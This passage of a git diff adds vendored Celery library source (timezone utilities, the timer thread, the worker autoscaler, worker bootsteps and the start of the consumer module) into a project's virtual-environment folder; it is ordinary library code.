+    def __repr__(self) -> str:
+        return f'<LocalTimezone: UTC{int(self.DSTOFFSET.total_seconds() / 3600):+03d}>'
+
+    def utcoffset(self, dt: datetime) -> timedelta:
+        return self.DSTOFFSET if self._isdst(dt) else self.STDOFFSET
+
+    def dst(self, dt: datetime) -> timedelta:
+        return self.DSTDIFF if self._isdst(dt) else ZERO
+
+    def tzname(self, dt: datetime) -> str:
+        return _time.tzname[self._isdst(dt)]
+
+    def fromutc(self, dt: datetime) -> datetime:
+        # The base tzinfo class no longer implements a DST
+        # offset aware .fromutc() in Python 3 (Issue #2306).
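+        # Build (and cache) a fixed-offset timezone matching the current
+        # UTC offset, then delegate the conversion to it.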
+ offset = int(self.utcoffset(dt).seconds / 60.0) + try: + tz = self._offset_cache[offset] + except KeyError: + tz = self._offset_cache[offset] = datetime_timezone( + timedelta(minutes=offset)) + return tz.fromutc(dt.replace(tzinfo=tz)) + + def _isdst(self, dt: datetime) -> bool: + tt = (dt.year, dt.month, dt.day, + dt.hour, dt.minute, dt.second, + dt.weekday(), 0, 0) + stamp = _time.mktime(tt) + tt = _time.localtime(stamp) + return tt.tm_isdst > 0 + + +class _Zone: + """Timezone class that provides the timezone for the application. + If `enable_utc` is disabled, LocalTimezone is provided as the timezone provider through local(). + Otherwise, this class provides a UTC ZoneInfo instance as the timezone provider for the application. + + Additionally this class provides a few utility methods for converting datetimes. + """ + + def tz_or_local(self, tzinfo: tzinfo | None = None) -> tzinfo: + """Return either our local timezone or the provided timezone.""" + + # pylint: disable=redefined-outer-name + if tzinfo is None: + return self.local + return self.get_timezone(tzinfo) + + def to_local(self, dt: datetime, local=None, orig=None): + """Converts a datetime to the local timezone.""" + + if is_naive(dt): + dt = make_aware(dt, orig or self.utc) + return localize(dt, self.tz_or_local(local)) + + def to_system(self, dt: datetime) -> datetime: + """Converts a datetime to the system timezone.""" + + # tz=None is a special case since Python 3.3, and will + # convert to the current local timezone (Issue #2306). + return dt.astimezone(tz=None) + + def to_local_fallback(self, dt: datetime) -> datetime: + """Converts a datetime to the local timezone, or the system timezone.""" + if is_naive(dt): + return make_aware(dt, self.local) + return localize(dt, self.local) + + def get_timezone(self, zone: str | tzinfo) -> tzinfo: + """Returns ZoneInfo timezone if the provided zone is a string, otherwise return the zone.""" + if isinstance(zone, str): + return ZoneInfo(zone) + return zone + + @cached_property + def local(self) -> LocalTimezone: + """Return LocalTimezone instance for the application.""" + return LocalTimezone() + + @cached_property + def utc(self) -> tzinfo: + """Return UTC timezone created with ZoneInfo.""" + return self.get_timezone('UTC') + + +timezone = _Zone() + + +def maybe_timedelta(delta: int) -> timedelta: + """Convert integer to timedelta, if argument is an integer.""" + if isinstance(delta, numbers.Real): + return timedelta(seconds=delta) + return delta + + +def delta_resolution(dt: datetime, delta: timedelta) -> datetime: + """Round a :class:`~datetime.datetime` to the resolution of timedelta. + + If the :class:`~datetime.timedelta` is in days, the + :class:`~datetime.datetime` will be rounded to the nearest days, + if the :class:`~datetime.timedelta` is in hours the + :class:`~datetime.datetime` will be rounded to the nearest hour, + and so on until seconds, which will just return the original + :class:`~datetime.datetime`. + """ + delta = max(delta.total_seconds(), 0) + + resolutions = ((3, lambda x: x / 86400), + (4, lambda x: x / 3600), + (5, lambda x: x / 60)) + + args = dt.year, dt.month, dt.day, dt.hour, dt.minute, dt.second + for res, predicate in resolutions: + if predicate(delta) >= 1.0: + return datetime(*args[:res], tzinfo=dt.tzinfo) + return dt + + +def remaining( + start: datetime, ends_in: timedelta, now: Callable | None = None, + relative: bool = False) -> timedelta: + """Calculate the remaining time for a start date and a timedelta. 
+ + For example, "how many seconds left for 30 seconds after start?" + + Arguments: + start (~datetime.datetime): Starting date. + ends_in (~datetime.timedelta): The end delta. + relative (bool): If enabled the end time will be calculated + using :func:`delta_resolution` (i.e., rounded to the + resolution of `ends_in`). + now (Callable): Function returning the current time and date. + Defaults to :func:`datetime.utcnow`. + + Returns: + ~datetime.timedelta: Remaining time. + """ + now = now or datetime.utcnow() + if str( + start.tzinfo) == str( + now.tzinfo) and now.utcoffset() != start.utcoffset(): + # DST started/ended + start = start.replace(tzinfo=now.tzinfo) + end_date = start + ends_in + if relative: + end_date = delta_resolution(end_date, ends_in).replace(microsecond=0) + ret = end_date - now + if C_REMDEBUG: # pragma: no cover + print('rem: NOW:{!r} START:{!r} ENDS_IN:{!r} END_DATE:{} REM:{}'.format( + now, start, ends_in, end_date, ret)) + return ret + + +def rate(r: str) -> float: + """Convert rate string (`"100/m"`, `"2/h"` or `"0.5/s"`) to seconds.""" + if r: + if isinstance(r, str): + ops, _, modifier = r.partition('/') + return RATE_MODIFIER_MAP[modifier or 's'](float(ops)) or 0 + return r or 0 + return 0 + + +def weekday(name: str) -> int: + """Return the position of a weekday: 0 - 7, where 0 is Sunday. + + Example: + >>> weekday('sunday'), weekday('sun'), weekday('mon') + (0, 0, 1) + """ + abbreviation = name[0:3].lower() + try: + return WEEKDAYS[abbreviation] + except KeyError: + # Show original day name in exception, instead of abbr. + raise KeyError(name) + + +def humanize_seconds( + secs: int, prefix: str = '', sep: str = '', now: str = 'now', + microseconds: bool = False) -> str: + """Show seconds in human form. + + For example, 60 becomes "1 minute", and 7200 becomes "2 hours". + + Arguments: + prefix (str): can be used to add a preposition to the output + (e.g., 'in' will give 'in 1 second', but add nothing to 'now'). + now (str): Literal 'now'. + microseconds (bool): Include microseconds. + """ + secs = float(format(float(secs), '.2f')) + for unit, divider, formatter in TIME_UNITS: + if secs >= divider: + w = secs / float(divider) + return '{}{}{} {}'.format(prefix, sep, formatter(w), + pluralize(w, unit)) + if microseconds and secs > 0.0: + return '{prefix}{sep}{0:.2f} seconds'.format( + secs, sep=sep, prefix=prefix) + return now + + +def maybe_iso8601(dt: datetime | str | None) -> None | datetime: + """Either ``datetime | str -> datetime`` or ``None -> None``.""" + if not dt: + return + if isinstance(dt, datetime): + return dt + return datetime.fromisoformat(dt) + + +def is_naive(dt: datetime) -> bool: + """Return True if :class:`~datetime.datetime` is naive, meaning it doesn't have timezone info set.""" + return dt.tzinfo is None or dt.tzinfo.utcoffset(dt) is None + + +def _can_detect_ambiguous(tz: tzinfo) -> bool: + """Helper function to determine if a timezone can detect ambiguous times using dateutil.""" + + return isinstance(tz, ZoneInfo) or hasattr(tz, "is_ambiguous") + + +def _is_ambigious(dt: datetime, tz: tzinfo) -> bool: + """Helper function to determine if a timezone is ambiguous using python's dateutil module. + + Returns False if the timezone cannot detect ambiguity, or if there is no ambiguity, otherwise True. + + In order to detect ambiguous datetimes, the timezone must be built using ZoneInfo, or have an is_ambiguous + method. 
Previously, pytz timezones would throw an AmbiguousTimeError if the localized dt was ambiguous, + but now we need to specifically check for ambiguity with dateutil, as pytz is deprecated. + """ + + return _can_detect_ambiguous(tz) and dateutil_tz.datetime_ambiguous(dt) + + +def make_aware(dt: datetime, tz: tzinfo) -> datetime: + """Set timezone for a :class:`~datetime.datetime` object.""" + + dt = dt.replace(tzinfo=tz) + if _is_ambigious(dt, tz): + dt = min(dt.replace(fold=0), dt.replace(fold=1)) + return dt + + +def localize(dt: datetime, tz: tzinfo) -> datetime: + """Convert aware :class:`~datetime.datetime` to another timezone. + + Using a ZoneInfo timezone will give the most flexibility in terms of ambiguous DST handling. + """ + if is_naive(dt): # Ensure timezone aware datetime + dt = make_aware(dt, tz) + if dt.tzinfo == ZoneInfo("UTC"): + dt = dt.astimezone(tz) # Always safe to call astimezone on utc zones + return dt + + +def to_utc(dt: datetime) -> datetime: + """Convert naive :class:`~datetime.datetime` to UTC.""" + return make_aware(dt, timezone.utc) + + +def maybe_make_aware(dt: datetime, tz: tzinfo | None = None, + naive_as_utc: bool = True) -> datetime: + """Convert dt to aware datetime, do nothing if dt is already aware.""" + if is_naive(dt): + if naive_as_utc: + dt = to_utc(dt) + return localize( + dt, timezone.utc if tz is None else timezone.tz_or_local(tz), + ) + return dt + + +class ffwd: + """Version of ``dateutil.relativedelta`` that only supports addition.""" + + def __init__(self, year=None, month=None, weeks=0, weekday=None, day=None, + hour=None, minute=None, second=None, microsecond=None, + **kwargs: Any): + # pylint: disable=redefined-outer-name + # weekday is also a function in outer scope. + self.year = year + self.month = month + self.weeks = weeks + self.weekday = weekday + self.day = day + self.hour = hour + self.minute = minute + self.second = second + self.microsecond = microsecond + self.days = weeks * 7 + self._has_time = self.hour is not None or self.minute is not None + + def __repr__(self) -> str: + return reprcall('ffwd', (), self._fields(weeks=self.weeks, + weekday=self.weekday)) + + def __radd__(self, other: Any) -> timedelta: + if not isinstance(other, date): + return NotImplemented + year = self.year or other.year + month = self.month or other.month + day = min(monthrange(year, month)[1], self.day or other.day) + ret = other.replace(**dict(dictfilter(self._fields()), + year=year, month=month, day=day)) + if self.weekday is not None: + ret += timedelta(days=(7 - ret.weekday() + self.weekday) % 7) + return ret + timedelta(days=self.days) + + def _fields(self, **extra: Any) -> dict[str, Any]: + return dictfilter({ + 'year': self.year, 'month': self.month, 'day': self.day, + 'hour': self.hour, 'minute': self.minute, + 'second': self.second, 'microsecond': self.microsecond, + }, **extra) + + +def utcoffset( + time: ModuleType = _time, + localtime: Callable[..., _time.struct_time] = _time.localtime) -> float: + """Return the current offset to UTC in hours.""" + if localtime().tm_isdst: + return time.altzone // 3600 + return time.timezone // 3600 + + +def adjust_timestamp(ts: float, offset: int, + here: Callable[..., float] = utcoffset) -> float: + """Adjust timestamp based on provided utcoffset.""" + return ts - (offset - here()) * 3600 + + +def get_exponential_backoff_interval( + factor: int, + retries: int, + maximum: int, + full_jitter: bool = False +) -> int: + """Calculate the exponential backoff wait time.""" + # Will be zero if factor equals 0 + 
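+    # e.g. factor=1, retries=3, maximum=60 gives min(60, 1 * 2**3) = 8 seconds
+    # as the base wait; with full_jitter the wait is then drawn uniformly from
+    # random.randrange(8 + 1), i.e. anywhere between 0 and 8 seconds.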
countdown = min(maximum, factor * (2 ** retries)) + # Full jitter according to + # https://aws.amazon.com/blogs/architecture/exponential-backoff-and-jitter/ + if full_jitter: + countdown = random.randrange(countdown + 1) + # Adjust according to maximum wait time and account for negative values. + return max(0, countdown) diff --git a/env/Lib/site-packages/celery/utils/timer2.py b/env/Lib/site-packages/celery/utils/timer2.py new file mode 100644 index 00000000..88d8ffd7 --- /dev/null +++ b/env/Lib/site-packages/celery/utils/timer2.py @@ -0,0 +1,154 @@ +"""Scheduler for Python functions. + +.. note:: + This is used for the thread-based worker only, + not for amqp/redis/sqs/qpid where :mod:`kombu.asynchronous.timer` is used. +""" +import os +import sys +import threading +from itertools import count +from threading import TIMEOUT_MAX as THREAD_TIMEOUT_MAX +from time import sleep + +from kombu.asynchronous.timer import Entry +from kombu.asynchronous.timer import Timer as Schedule +from kombu.asynchronous.timer import logger, to_timestamp + +TIMER_DEBUG = os.environ.get('TIMER_DEBUG') + +__all__ = ('Entry', 'Schedule', 'Timer', 'to_timestamp') + + +class Timer(threading.Thread): + """Timer thread. + + Note: + This is only used for transports not supporting AsyncIO. + """ + + Entry = Entry + Schedule = Schedule + + running = False + on_tick = None + + _timer_count = count(1) + + if TIMER_DEBUG: # pragma: no cover + def start(self, *args, **kwargs): + import traceback + print('- Timer starting') + traceback.print_stack() + super().start(*args, **kwargs) + + def __init__(self, schedule=None, on_error=None, on_tick=None, + on_start=None, max_interval=None, **kwargs): + self.schedule = schedule or self.Schedule(on_error=on_error, + max_interval=max_interval) + self.on_start = on_start + self.on_tick = on_tick or self.on_tick + super().__init__() + # `_is_stopped` is likely to be an attribute on `Thread` objects so we + # double underscore these names to avoid shadowing anything and + # potentially getting confused by the superclass turning these into + # something other than an `Event` instance (e.g. a `bool`) + self.__is_shutdown = threading.Event() + self.__is_stopped = threading.Event() + self.mutex = threading.Lock() + self.not_empty = threading.Condition(self.mutex) + self.daemon = True + self.name = f'Timer-{next(self._timer_count)}' + + def _next_entry(self): + with self.not_empty: + delay, entry = next(self.scheduler) + if entry is None: + if delay is None: + self.not_empty.wait(1.0) + return delay + return self.schedule.apply_entry(entry) + __next__ = next = _next_entry # for 2to3 + + def run(self): + try: + self.running = True + self.scheduler = iter(self.schedule) + + while not self.__is_shutdown.is_set(): + delay = self._next_entry() + if delay: + if self.on_tick: + self.on_tick(delay) + if sleep is None: # pragma: no cover + break + sleep(delay) + try: + self.__is_stopped.set() + except TypeError: # pragma: no cover + # we lost the race at interpreter shutdown, + # so gc collected built-in modules. 
+ pass + except Exception as exc: + logger.error('Thread Timer crashed: %r', exc, exc_info=True) + sys.stderr.flush() + os._exit(1) + + def stop(self): + self.__is_shutdown.set() + if self.running: + self.__is_stopped.wait() + self.join(THREAD_TIMEOUT_MAX) + self.running = False + + def ensure_started(self): + if not self.running and not self.is_alive(): + if self.on_start: + self.on_start(self) + self.start() + + def _do_enter(self, meth, *args, **kwargs): + self.ensure_started() + with self.mutex: + entry = getattr(self.schedule, meth)(*args, **kwargs) + self.not_empty.notify() + return entry + + def enter(self, entry, eta, priority=None): + return self._do_enter('enter_at', entry, eta, priority=priority) + + def call_at(self, *args, **kwargs): + return self._do_enter('call_at', *args, **kwargs) + + def enter_after(self, *args, **kwargs): + return self._do_enter('enter_after', *args, **kwargs) + + def call_after(self, *args, **kwargs): + return self._do_enter('call_after', *args, **kwargs) + + def call_repeatedly(self, *args, **kwargs): + return self._do_enter('call_repeatedly', *args, **kwargs) + + def exit_after(self, secs, priority=10): + self.call_after(secs, sys.exit, priority) + + def cancel(self, tref): + tref.cancel() + + def clear(self): + self.schedule.clear() + + def empty(self): + return not len(self) + + def __len__(self): + return len(self.schedule) + + def __bool__(self): + """``bool(timer)``.""" + return True + __nonzero__ = __bool__ + + @property + def queue(self): + return self.schedule.queue diff --git a/env/Lib/site-packages/celery/worker/__init__.py b/env/Lib/site-packages/celery/worker/__init__.py new file mode 100644 index 00000000..51106807 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/__init__.py @@ -0,0 +1,4 @@ +"""Worker implementation.""" +from .worker import WorkController + +__all__ = ('WorkController',) diff --git a/env/Lib/site-packages/celery/worker/autoscale.py b/env/Lib/site-packages/celery/worker/autoscale.py new file mode 100644 index 00000000..e5b9024c --- /dev/null +++ b/env/Lib/site-packages/celery/worker/autoscale.py @@ -0,0 +1,154 @@ +"""Pool Autoscaling. + +This module implements the internal thread responsible +for growing and shrinking the pool according to the +current autoscale settings. + +The autoscale thread is only enabled if +the :option:`celery worker --autoscale` option is used. +""" +import os +import threading +from time import monotonic, sleep + +from kombu.asynchronous.semaphore import DummyLock + +from celery import bootsteps +from celery.utils.log import get_logger +from celery.utils.threads import bgThread + +from . 
import state +from .components import Pool + +__all__ = ('Autoscaler', 'WorkerComponent') + +logger = get_logger(__name__) +debug, info, error = logger.debug, logger.info, logger.error + +AUTOSCALE_KEEPALIVE = float(os.environ.get('AUTOSCALE_KEEPALIVE', 30)) + + +class WorkerComponent(bootsteps.StartStopStep): + """Bootstep that starts the autoscaler thread/timer in the worker.""" + + label = 'Autoscaler' + conditional = True + requires = (Pool,) + + def __init__(self, w, **kwargs): + self.enabled = w.autoscale + w.autoscaler = None + + def create(self, w): + scaler = w.autoscaler = self.instantiate( + w.autoscaler_cls, + w.pool, w.max_concurrency, w.min_concurrency, + worker=w, mutex=DummyLock() if w.use_eventloop else None, + ) + return scaler if not w.use_eventloop else None + + def register_with_event_loop(self, w, hub): + w.consumer.on_task_message.add(w.autoscaler.maybe_scale) + hub.call_repeatedly( + w.autoscaler.keepalive, w.autoscaler.maybe_scale, + ) + + def info(self, w): + """Return `Autoscaler` info.""" + return {'autoscaler': w.autoscaler.info()} + + +class Autoscaler(bgThread): + """Background thread to autoscale pool workers.""" + + def __init__(self, pool, max_concurrency, + min_concurrency=0, worker=None, + keepalive=AUTOSCALE_KEEPALIVE, mutex=None): + super().__init__() + self.pool = pool + self.mutex = mutex or threading.Lock() + self.max_concurrency = max_concurrency + self.min_concurrency = min_concurrency + self.keepalive = keepalive + self._last_scale_up = None + self.worker = worker + + assert self.keepalive, 'cannot scale down too fast.' + + def body(self): + with self.mutex: + self.maybe_scale() + sleep(1.0) + + def _maybe_scale(self, req=None): + procs = self.processes + cur = min(self.qty, self.max_concurrency) + if cur > procs: + self.scale_up(cur - procs) + return True + cur = max(self.qty, self.min_concurrency) + if cur < procs: + self.scale_down(procs - cur) + return True + + def maybe_scale(self, req=None): + if self._maybe_scale(req): + self.pool.maintain_pool() + + def update(self, max=None, min=None): + with self.mutex: + if max is not None: + if max < self.processes: + self._shrink(self.processes - max) + self._update_consumer_prefetch_count(max) + self.max_concurrency = max + if min is not None: + if min > self.processes: + self._grow(min - self.processes) + self.min_concurrency = min + return self.max_concurrency, self.min_concurrency + + def scale_up(self, n): + self._last_scale_up = monotonic() + return self._grow(n) + + def scale_down(self, n): + if self._last_scale_up and ( + monotonic() - self._last_scale_up > self.keepalive): + return self._shrink(n) + + def _grow(self, n): + info('Scaling up %s processes.', n) + self.pool.grow(n) + + def _shrink(self, n): + info('Scaling down %s processes.', n) + try: + self.pool.shrink(n) + except ValueError: + debug("Autoscaler won't scale down: all processes busy.") + except Exception as exc: + error('Autoscaler: scale_down: %r', exc, exc_info=True) + + def _update_consumer_prefetch_count(self, new_max): + diff = new_max - self.max_concurrency + if diff: + self.worker.consumer._update_prefetch_count( + diff + ) + + def info(self): + return { + 'max': self.max_concurrency, + 'min': self.min_concurrency, + 'current': self.processes, + 'qty': self.qty, + } + + @property + def qty(self): + return len(state.reserved_requests) + + @property + def processes(self): + return self.pool.num_processes diff --git a/env/Lib/site-packages/celery/worker/components.py b/env/Lib/site-packages/celery/worker/components.py new 
file mode 100644 index 00000000..f062affb --- /dev/null +++ b/env/Lib/site-packages/celery/worker/components.py @@ -0,0 +1,240 @@ +"""Worker-level Bootsteps.""" +import atexit +import warnings + +from kombu.asynchronous import Hub as _Hub +from kombu.asynchronous import get_event_loop, set_event_loop +from kombu.asynchronous.semaphore import DummyLock, LaxBoundedSemaphore +from kombu.asynchronous.timer import Timer as _Timer + +from celery import bootsteps +from celery._state import _set_task_join_will_block +from celery.exceptions import ImproperlyConfigured +from celery.platforms import IS_WINDOWS +from celery.utils.log import worker_logger as logger + +__all__ = ('Timer', 'Hub', 'Pool', 'Beat', 'StateDB', 'Consumer') + +GREEN_POOLS = {'eventlet', 'gevent'} + +ERR_B_GREEN = """\ +-B option doesn't work with eventlet/gevent pools: \ +use standalone beat instead.\ +""" + +W_POOL_SETTING = """ +The worker_pool setting shouldn't be used to select the eventlet/gevent +pools, instead you *must use the -P* argument so that patches are applied +as early as possible. +""" + + +class Timer(bootsteps.Step): + """Timer bootstep.""" + + def create(self, w): + if w.use_eventloop: + # does not use dedicated timer thread. + w.timer = _Timer(max_interval=10.0) + else: + if not w.timer_cls: + # Default Timer is set by the pool, as for example, the + # eventlet pool needs a custom timer implementation. + w.timer_cls = w.pool_cls.Timer + w.timer = self.instantiate(w.timer_cls, + max_interval=w.timer_precision, + on_error=self.on_timer_error, + on_tick=self.on_timer_tick) + + def on_timer_error(self, exc): + logger.error('Timer error: %r', exc, exc_info=True) + + def on_timer_tick(self, delay): + logger.debug('Timer wake-up! Next ETA %s secs.', delay) + + +class Hub(bootsteps.StartStopStep): + """Worker starts the event loop.""" + + requires = (Timer,) + + def __init__(self, w, **kwargs): + w.hub = None + super().__init__(w, **kwargs) + + def include_if(self, w): + return w.use_eventloop + + def create(self, w): + w.hub = get_event_loop() + if w.hub is None: + required_hub = getattr(w._conninfo, 'requires_hub', None) + w.hub = set_event_loop(( + required_hub if required_hub else _Hub)(w.timer)) + self._patch_thread_primitives(w) + return self + + def start(self, w): + pass + + def stop(self, w): + w.hub.close() + + def terminate(self, w): + w.hub.close() + + def _patch_thread_primitives(self, w): + # make clock use dummy lock + w.app.clock.mutex = DummyLock() + # multiprocessing's ApplyResult uses this lock. + try: + from billiard import pool + except ImportError: + pass + else: + pool.Lock = DummyLock + + +class Pool(bootsteps.StartStopStep): + """Bootstep managing the worker pool. + + Describes how to initialize the worker pool, and starts and stops + the pool during worker start-up/shutdown. 
+ + Adds attributes: + + * autoscale + * pool + * max_concurrency + * min_concurrency + """ + + requires = (Hub,) + + def __init__(self, w, autoscale=None, **kwargs): + w.pool = None + w.max_concurrency = None + w.min_concurrency = w.concurrency + self.optimization = w.optimization + if isinstance(autoscale, str): + max_c, _, min_c = autoscale.partition(',') + autoscale = [int(max_c), min_c and int(min_c) or 0] + w.autoscale = autoscale + if w.autoscale: + w.max_concurrency, w.min_concurrency = w.autoscale + super().__init__(w, **kwargs) + + def close(self, w): + if w.pool: + w.pool.close() + + def terminate(self, w): + if w.pool: + w.pool.terminate() + + def create(self, w): + semaphore = None + max_restarts = None + if w.app.conf.worker_pool in GREEN_POOLS: # pragma: no cover + warnings.warn(UserWarning(W_POOL_SETTING)) + threaded = not w.use_eventloop or IS_WINDOWS + procs = w.min_concurrency + w.process_task = w._process_task + if not threaded: + semaphore = w.semaphore = LaxBoundedSemaphore(procs) + w._quick_acquire = w.semaphore.acquire + w._quick_release = w.semaphore.release + max_restarts = 100 + if w.pool_putlocks and w.pool_cls.uses_semaphore: + w.process_task = w._process_task_sem + allow_restart = w.pool_restarts + pool = w.pool = self.instantiate( + w.pool_cls, w.min_concurrency, + initargs=(w.app, w.hostname), + maxtasksperchild=w.max_tasks_per_child, + max_memory_per_child=w.max_memory_per_child, + timeout=w.time_limit, + soft_timeout=w.soft_time_limit, + putlocks=w.pool_putlocks and threaded, + lost_worker_timeout=w.worker_lost_wait, + threads=threaded, + max_restarts=max_restarts, + allow_restart=allow_restart, + forking_enable=True, + semaphore=semaphore, + sched_strategy=self.optimization, + app=w.app, + ) + _set_task_join_will_block(pool.task_join_will_block) + return pool + + def info(self, w): + return {'pool': w.pool.info if w.pool else 'N/A'} + + def register_with_event_loop(self, w, hub): + w.pool.register_with_event_loop(hub) + + +class Beat(bootsteps.StartStopStep): + """Step used to embed a beat process. + + Enabled when the ``beat`` argument is set. 
+ """ + + label = 'Beat' + conditional = True + + def __init__(self, w, beat=False, **kwargs): + self.enabled = w.beat = beat + w.beat = None + super().__init__(w, beat=beat, **kwargs) + + def create(self, w): + from celery.beat import EmbeddedService + if w.pool_cls.__module__.endswith(('gevent', 'eventlet')): + raise ImproperlyConfigured(ERR_B_GREEN) + b = w.beat = EmbeddedService(w.app, + schedule_filename=w.schedule_filename, + scheduler_cls=w.scheduler) + return b + + +class StateDB(bootsteps.Step): + """Bootstep that sets up between-restart state database file.""" + + def __init__(self, w, **kwargs): + self.enabled = w.statedb + w._persistence = None + super().__init__(w, **kwargs) + + def create(self, w): + w._persistence = w.state.Persistent(w.state, w.statedb, w.app.clock) + atexit.register(w._persistence.save) + + +class Consumer(bootsteps.StartStopStep): + """Bootstep starting the Consumer blueprint.""" + + last = True + + def create(self, w): + if w.max_concurrency: + prefetch_count = max(w.max_concurrency, 1) * w.prefetch_multiplier + else: + prefetch_count = w.concurrency * w.prefetch_multiplier + c = w.consumer = self.instantiate( + w.consumer_cls, w.process_task, + hostname=w.hostname, + task_events=w.task_events, + init_callback=w.ready_callback, + initial_prefetch_count=prefetch_count, + pool=w.pool, + timer=w.timer, + app=w.app, + controller=w, + hub=w.hub, + worker_options=w.options, + disable_rate_limits=w.disable_rate_limits, + prefetch_multiplier=w.prefetch_multiplier, + ) + return c diff --git a/env/Lib/site-packages/celery/worker/consumer/__init__.py b/env/Lib/site-packages/celery/worker/consumer/__init__.py new file mode 100644 index 00000000..129801f7 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/__init__.py @@ -0,0 +1,15 @@ +"""Worker consumer.""" +from .agent import Agent +from .connection import Connection +from .consumer import Consumer +from .control import Control +from .events import Events +from .gossip import Gossip +from .heart import Heart +from .mingle import Mingle +from .tasks import Tasks + +__all__ = ( + 'Consumer', 'Agent', 'Connection', 'Control', + 'Events', 'Gossip', 'Heart', 'Mingle', 'Tasks', +) diff --git a/env/Lib/site-packages/celery/worker/consumer/agent.py b/env/Lib/site-packages/celery/worker/consumer/agent.py new file mode 100644 index 00000000..ca6d1209 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/agent.py @@ -0,0 +1,21 @@ +"""Celery + :pypi:`cell` integration.""" +from celery import bootsteps + +from .connection import Connection + +__all__ = ('Agent',) + + +class Agent(bootsteps.StartStopStep): + """Agent starts :pypi:`cell` actors.""" + + conditional = True + requires = (Connection,) + + def __init__(self, c, **kwargs): + self.agent_cls = self.enabled = c.app.conf.worker_agent + super().__init__(c, **kwargs) + + def create(self, c): + agent = c.agent = self.instantiate(self.agent_cls, c.connection) + return agent diff --git a/env/Lib/site-packages/celery/worker/consumer/connection.py b/env/Lib/site-packages/celery/worker/consumer/connection.py new file mode 100644 index 00000000..2992dc8c --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/connection.py @@ -0,0 +1,36 @@ +"""Consumer Broker Connection Bootstep.""" +from kombu.common import ignore_errors + +from celery import bootsteps +from celery.utils.log import get_logger + +__all__ = ('Connection',) + +logger = get_logger(__name__) +info = logger.info + + +class Connection(bootsteps.StartStopStep): + """Service managing the 
consumer broker connection.""" + + def __init__(self, c, **kwargs): + c.connection = None + super().__init__(c, **kwargs) + + def start(self, c): + c.connection = c.connect() + info('Connected to %s', c.connection.as_uri()) + + def shutdown(self, c): + # We must set self.connection to None here, so + # that the green pidbox thread exits. + connection, c.connection = c.connection, None + if connection: + ignore_errors(connection, connection.close) + + def info(self, c): + params = 'N/A' + if c.connection: + params = c.connection.info() + params.pop('password', None) # don't send password. + return {'broker': params} diff --git a/env/Lib/site-packages/celery/worker/consumer/consumer.py b/env/Lib/site-packages/celery/worker/consumer/consumer.py new file mode 100644 index 00000000..e072ef57 --- /dev/null +++ b/env/Lib/site-packages/celery/worker/consumer/consumer.py @@ -0,0 +1,745 @@ +"""Worker Consumer Blueprint. + +This module contains the components responsible for consuming messages +from the broker, processing the messages and keeping the broker connections +up and running. +""" +import errno +import logging +import os +import warnings +from collections import defaultdict +from time import sleep + +from billiard.common import restart_state +from billiard.exceptions import RestartFreqExceeded +from kombu.asynchronous.semaphore import DummyLock +from kombu.exceptions import ContentDisallowed, DecodeError +from kombu.utils.compat import _detect_environment +from kombu.utils.encoding import safe_repr +from kombu.utils.limits import TokenBucket +from vine import ppartial, promise + +from celery import bootsteps, signals +from celery.app.trace import build_tracer +from celery.exceptions import (CPendingDeprecationWarning, InvalidTaskError, NotRegistered, WorkerShutdown, + WorkerTerminate) +from celery.utils.functional import noop +from celery.utils.log import get_logger +from celery.utils.nodenames import gethostname +from celery.utils.objects import Bunch +from celery.utils.text import truncate +from celery.utils.time import humanize_seconds, rate +from celery.worker import loops +from celery.worker.state import active_requests, maybe_shutdown, requests, reserved_requests, task_reserved + +__all__ = ('Consumer', 'Evloop', 'dump_body') + +CLOSE = bootsteps.CLOSE +TERMINATE = bootsteps.TERMINATE +STOP_CONDITIONS = {CLOSE, TERMINATE} +logger = get_logger(__name__) +debug, info, warn, error, crit = (logger.debug, logger.info, logger.warning, + logger.error, logger.critical) + +CONNECTION_RETRY = """\ +consumer: Connection to broker lost. \ +Trying to re-establish the connection...\ +""" + +CONNECTION_RETRY_STEP = """\ +Trying again {when}... ({retries}/{max_retries})\ +""" + +CONNECTION_ERROR = """\ +consumer: Cannot connect to %s: %s. +%s +""" + +CONNECTION_FAILOVER = """\ +Will retry using next failover.\ +""" + +UNKNOWN_FORMAT = """\ +Received and deleted unknown message. Wrong destination?!? + +The full contents of the message body was: %s +""" + +#: Error message for when an unregistered task is received. +UNKNOWN_TASK_ERROR = """\ +Received unregistered task of type %s. +The message has been ignored and discarded. + +Did you remember to import the module containing this task? +Or maybe you're using relative imports? + +Please see +https://docs.celeryq.dev/en/latest/internals/protocol.html +for more information. 
+ +The full contents of the message body was: +%s + +The full contents of the message headers: +%s + +The delivery info for this task is: +%s +""" + +#: Error message for when an invalid task message is received. +INVALID_TASK_ERROR = """\ +Received invalid task message: %s +The message has been ignored and discarded. + +Please ensure your message conforms to the task +message protocol as described here: +https://docs.celeryq.dev/en/latest/internals/protocol.html + +The full contents of the message body was: +%s +""" + +MESSAGE_DECODE_ERROR = """\ +Can't decode message body: %r [type:%r encoding:%r headers:%s] + +body: %s +""" + +MESSAGE_REPORT = """\ +body: {0} +{{content_type:{1} content_encoding:{2} + delivery_info:{3} headers={4}}} +""" + +TERMINATING_TASK_ON_RESTART_AFTER_A_CONNECTION_LOSS = """\ +Task %s cannot be acknowledged after a connection loss since late acknowledgement is enabled for it. +Terminating it instead. +""" + +CANCEL_TASKS_BY_DEFAULT = """ +In Celery 5.1 we introduced an optional breaking change which +on connection loss cancels all currently executed tasks with late acknowledgement enabled. +These tasks cannot be acknowledged as the connection is gone, and the tasks are automatically redelivered +back to the queue. You can enable this behavior using the worker_cancel_long_running_tasks_on_connection_loss +setting. In Celery 5.1 it is set to False by default. The setting will be set to True by default in Celery 6.0. +""" + + +def dump_body(m, body): + """Format message body for debugging purposes.""" + # v2 protocol does not deserialize body + body = m.body if body is None else body + return '{} ({}b)'.format(truncate(safe_repr(body), 1024), + len(m.body)) + + +class Consumer: + """Consumer blueprint.""" + + Strategies = dict + + #: Optional callback called the first time the worker + #: is ready to receive tasks. + init_callback = None + + #: The current worker pool instance. + pool = None + + #: A timer used for high-priority internal tasks, such + #: as sending heartbeats. + timer = None + + restart_count = -1 # first start is the same as a restart + + #: This flag will be turned off after the first failed + #: connection attempt. 
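+    #: While this is still true, connection retries are governed by the
+    #: ``broker_connection_retry_on_startup`` setting (when it is set); once
+    #: flipped, the regular ``broker_connection_retry`` setting applies
+    #: (see :meth:`_get_connection_retry_type` and :meth:`ensure_connected`).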
